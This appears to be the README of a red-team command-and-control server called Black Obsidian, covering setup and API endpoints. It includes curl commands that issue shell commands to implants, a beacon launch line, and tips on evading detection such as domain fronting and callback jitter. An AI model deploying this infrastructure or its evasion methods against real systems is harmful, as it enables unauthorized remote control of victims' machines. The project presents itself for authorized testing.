Modern, realtime, minimalist Command & Control server built in Go with PocketBase
β¬ BLACK OBSIDIAN - Control Panel for Red Team Operations
βββ Realtime Implant Management
βββ AES-256 Encryption
βββ Multi-Platform Support
βββ Modern Web Dashboard
Black Obsidian is a next-generation C2 (Command & Control) server designed for professional Red Team operations. Built with Go and PocketBase, it offers a modern and specialized alternative to complex C2 servers while maintaining agility, security, and customization ease.
Part of the LazyOwn ecosystem, Black Obsidian integrates seamlessly with implants such as:
Maleable Implant (Go Multi-Platform)
-
β HTTPS/TLS Server with self-signed certificates
-
β AES-256 Encryption for all communications
-
β Realtime Management of connected implants
-
β Modern Web Dashboard with dark hacker theme
-
β Integrated Database (PocketBase SQLite)
-
β Automatic CSV Logs per client
-
β Pending Commands with execution status
-
β Multi-Implant parallel support
-
β Fully Functional REST API
-
β Scalable and customizable architecture
Go 1.20+
-
OpenSSL (for certificate generation)
-
Linux/macOS/Windows with Go support
-
Port 4444 available (or customizable)
go get github.com/pocketbase/pocketbase- Clone Repository
git clone https://github.com/grisuno/BlackObsidianC2.git
cd BlackObsidianC2- Generate SSL Certificates
# Generate private key
openssl genpkey -algorithm RSA -out key.pem -pkeyopt rsa_keygen_bits:2048
# Generate self-signed certificate
openssl req -new -x509 -key key.pem -out cert.pem -days 365 \
-subj "/C=CL/ST=Hack/L=World/O=C2/CN=127.0.0.1"
# Convert to PKCS#8 (required by Go)
openssl pkcs8 -topk8 -nocrypt -in key.pem -out key_go.pem- Compile
go build -o c2-server- Run
export TLS_CERT=./cert.pem
export TLS_KEY=./key_go.pem
export C2_AES_KEY=18547a9428b62fdf2ba11cebc786bccbca8a941748d3acf4aad100ac65d0477f
./c2-server serve --https=0.0.0.0:4444Access Dashboard
https://127.0.0.1:4444/dashboard.html
Create Admin User
./c2-server superuser create [email protected] LazyOwnLogin Credentials Username: [email protected]
Password: LazyOwn
Endpoint Method Description
- /login POST Authenticate user
- /get_connected_clients GET List active implants
- /pleasesubscribe/v1/users/{client_id} GET Fetch pending commands
- /pleasesubscribe/v1/users/{client_id} POST Submit command results
- /issue_command POST Issue command to implant
Encryption All communications use AES-256-GCM encryption:
// Example encryption in handlers
encryptedData, err := AESEncrypt([]byte(sensitiveData))TLS 1.2 - 1.3
Strong cipher suites only
Certificate pinning support
Basic auth for initial login
Session tokens with expiration
black-obsidian/
βββ main.go # Entry point
βββ handlers.go # API handlers
βββ crypto.go # AES encryption functions
βββ schemas.go # Database schemas
βββ web/ # Web dashboard
β βββ dashboard.html
β βββ css/
β βββ js/
β βββ img/
βββ pb_data/ # PocketBase database
βββ sessions/ # Client logs (CSV)
βββ go.mod
βββ go.sum
βββ README.md
Environment Variables
TLS_CERT # Path to SSL certificate
TLS_KEY # Path to SSL private key
C2_AES_KEY # AES encryption key (64 hex chars)
POCKETBASE_DIR # Database location (default: ./pb_data)Encryption Key Generation
# Generate random 256-bit AES key
openssl rand -hex 32
# Output: 18547a9428b62fdf2ba11cebc786bccbca8a941748d3acf4aad100ac65d0477fpython3 app.py or manual
curl -k -X POST https://127.0.0.1:4444/issue_command \
-d "client_id=linux_go&command=whoami" \
-H "Authorization: Bearer YOUR_TOKEN"Get Connected Clients
curl -k -X GET https://127.0.0.1:4444/get_connected_clients \
-H "Authorization: Bearer YOUR_TOKEN"Black Obsidian is designed to work with LazyOwn implants:
# Example: Black Sand Beacon (Linux)
./black-sand-beacon \
--c2=https://127.0.0.1:4444 \
--client-id=linux_go \
--aes-key=18547a9428b62fdf2ba11cebc786bccbca8a941748d3acf4aad100ac65d0477fUse VPN/Proxy for C2 infrastructure
Rotate AES keys periodically
Enable firewall rules to restrict access
Use domain fronting for HTTPS traffic
Implement jitter in beacon callbacks
Monitor logs for anomalies
Contributions welcome! Please:
Fork the repository
Create feature branch (git checkout -b feature/AmazingFeature)
Commit changes (git commit -m 'Add AmazingFeature')
Push branch (git push origin feature/AmazingFeature)
Open Pull Request
Black Obsidian is designed for authorized penetration testing and red team operations only. Unauthorized access to computer systems is illegal. Ensure you have explicit written authorization before conducting any offensive security activities.
This project is licensed under the GPLv3 - see LICENSE file for details.
grisun0 - LazyOwn Red Team Operator & Security Researcher
GitHub: @grisuno
Twitter: @lazyown.redteam
Medium: @lazyown.redteam
-
Pro Bof's for Black Basalt Beacon Only for patreons loader.x64.o loader_fluc.x64.o shellcodeloader.x64.o sudo.x64.o getsystem.x64.o (and their soources)
For issues, questions, or suggestions:
Open an Issue
Start a Discussion
Built with β¬ obsidian by LazyOwn Red Team operators, for the world Red Team operators.
β Ko-fi: ko-fi.com/grisuno (Buy me coffee. Iβll use it to compile more BOFs that vanish mid-execution.)
π Patreon: https://www.patreon.com/c/LazyOwn
ποΈ Podcast: https://www.podbean.com/ew/pb-gyy75-199a35d
ποΈ Hashnode: https://lazyown.hashnode.dev/
βοΈ Medium: https://medium.com/@lazyown.redteam
π‘ Reddit: https://www.reddit.com/r/LazyOwn/
ποΈ Youtube: https://www.youtube.com/@KillerMonkyRecordz
